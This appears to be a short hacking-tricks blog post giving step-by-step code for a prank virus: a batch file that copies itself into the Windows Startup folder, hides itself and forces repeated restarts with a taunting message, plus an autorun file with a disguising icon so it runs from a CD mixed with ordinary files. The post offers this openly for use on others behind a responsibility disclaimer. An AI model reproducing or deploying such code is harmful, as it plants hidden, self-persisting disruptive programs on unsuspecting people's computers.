For this we need 3 file
* 1 batch file
* ini file
* ico file (icon file )
Making a Batch file
@echo off
copy pic.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
attrib +h pic.bat
shutdown -r -t 0900 -c "need help? help help help me creat by me "
and save this as pic.bat
Making the ini file
Open a notepad and
[autorun]
open=pic.bat
icon=dragon.ico
Save it as autorun.ini
After making these files u can store them in cd with other ordinary file
and see what happen
Note:
Guys and all the beauties visiting my Blog plz take a note that I cannot be held responsible for any misuse or mishandling of any tricks or virus codes.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
0 comments:
Post a Comment